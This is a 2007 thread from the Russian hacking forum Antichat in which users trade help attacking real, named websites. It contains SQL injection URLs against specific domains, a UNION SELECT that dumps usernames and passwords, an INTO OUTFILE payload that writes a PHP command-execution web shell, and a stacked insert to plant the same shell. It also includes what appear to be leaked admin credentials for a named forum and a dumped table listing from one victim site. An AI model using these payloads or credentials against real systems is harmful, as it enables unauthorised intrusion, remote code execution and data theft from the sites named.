ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
14.04.2007, 19:16
|
|
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
Зачем? можно просто добавить пользователя к хосту и все!
zettich|123 добавить админа
vitovt|12345 админ на форуме http://forums.tut.by
можно залить шелл через форум и все! А того удалить.
Сорри за оффтоп
|
|
|
14.04.2007, 19:40
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
извинити за оффтоп но не понятно для чего сделана тема ведь в Sql Инъекции происходит тоже самое?
|
|
|
|
15.04.2007, 23:53
|
|
Постоянный
Регистрация: 11.11.2006
Сообщений: 834
Провел на форуме:
3941248
Репутация:
668
|
|
http://israblog.nana.co.il/blogread.asp?blog=-1'gh читал дето что еси возрощяет пустую страницу это может означать что скл иньекция там есть... как вы думаете есть там чтото или нет?
|
|
|
|
16.04.2007, 03:04
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
Провел на форуме:
4172659
Репутация:
646
|
|
Помогите найти скулю http://rudtp.ru/icc.php?id=1'
|
|
|
|
16.04.2007, 19:42
|
|
Новичок
Регистрация: 27.01.2007
Сообщений: 11
Провел на форуме:
82558
Репутация:
1
|
|
Help!
Есть инекция
Код HTML:
http://anime.megalan.ru/lite/index.php?cat=animation&mode=show_anime&id=-1+union+select+name,pass,2,2,3,4,5,6,7,8,4,2,6,7,9,1,2,3 from users
Как записать в таблицу users, в поле name
Код HTML:
<? system($_GET['cmd'])?>
И еще. Вот так не прокатывает. На сервере magic_ковычки=on
Код:
http://anime.megalan.ru/lite/index.php?cat=animation&mode=show_anime&id=-1+union+select+char(60,63,32,115,121,115,116,101,109,40,36,95,71,69,84,91,99,109,100,93,41,32,63,62),1,2,2,3,4,5,6,7,8,4,2,6,7,9,1,2,3+into+outfile+char(47,104,111,109,101,47,49,46,112,104,112)
Непрокатывает последний char().
Последний раз редактировалось wizmo; 16.04.2007 в 20:16..
|
|
|
|
16.04.2007, 20:45
|
|
Новичок
Регистрация: 03.12.2006
Сообщений: 16
Провел на форуме:
92377
Репутация:
2
|
|
Как записать в таблицу users, в поле name
http://anime.megalan.ru/lite/index.php?cat=animation&mode=show_anime&id=-1;insert into news (bla-bla-bla, ..., name, ..., bla-bla-bla) values('bla-bla-bla',...,'<? system($_GET["cmd"])?>', ..., 'bla-bla-bla');
Попробуй.
Непрокатывает последний char().
В папку должна быть запись разрешена.
Последний раз редактировалось SkyMan; 16.04.2007 в 20:57..
|
|
|
|
16.04.2007, 21:06
|
|
Новичок
Регистрация: 27.01.2007
Сообщений: 11
Провел на форуме:
82558
Репутация:
1
|
|
Доступ к папке здесь непричем. Тока что прочитал гдето что select "чтото" into outfile char("чтото") не прокатит. Типа особенность этой конструкции. Обязательно into outfile '/home/shell.php'. Без ковычек здесь не обойдешся... ((
|
|
|
|
16.04.2007, 21:31
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
wizmo
http://forum.antichat.ru/threadnav34338-1-10.html
|
|
|
|
20.04.2007, 21:02
|
|
Участник форума
Регистрация: 08.11.2006
Сообщений: 208
Провел на форуме:
1038169
Репутация:
184
|
|
http://www.nix.ru/dealers/howtofindus.html?key=1'+UNION+SELECT+1,1,1,3,3,3,3 ,3,3,3,3/*
обтрахался. как залить шелл? на форуме пасс от админа раскриптовал, хотя доступ к админке закрыт htaccess ом. нарыл в базе многа инфы.. безполезной.
*база с форумом phpbb2 если что, префикс phpbb_
|
|
|
|
20.04.2007, 21:37
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520
Репутация:
2996
|
|
версия mysql 5
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
TFDt_Lists_ext
Templates
Templates_Groups
adv_excludes
adv_nelikv_headers
advert_nel_prop
advert_nelikv
advert_nelikv_temp2
advert_nelikv_temp_s
advert_nelikv_temp_t
answers
articles
articles1
arttokens
assemblies_components
bad_dealers
banners
chapter_to_theme
chapter_to_theme1
chapters
chapters1
city_list
compare_table_item
compare_table_property
compare_table_values
conf_params
configurations2
context_search
contragent_properties
contragents
contragents_exchange_rates
contragents_parameters
contragents_pricing
contragents_properties
contragents_properties_default
contragents_rests
contragents_sets_default
correlations
csg_groups
current
cut_name_exc
dealer_names_pass
dealer_pass
dealers_data
dealers_data_temp
dealers_price_data
desc_goods_pictures
desc_groups
desc_pictures
disallowing_words
disallowing_words_1
download_servers
driver
driver_forum_links
driver_good
driver_group
driver_group_vendor
driver_os
driver_vendor
driver_vendor_urls
drivers_hp_section_links
drivers_request_questions
drivers_supported_groups
drvtokens
drvtokens_old
enum_data_types
enum_elements
faq_category
faq_hotlist
faq_obligatory
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
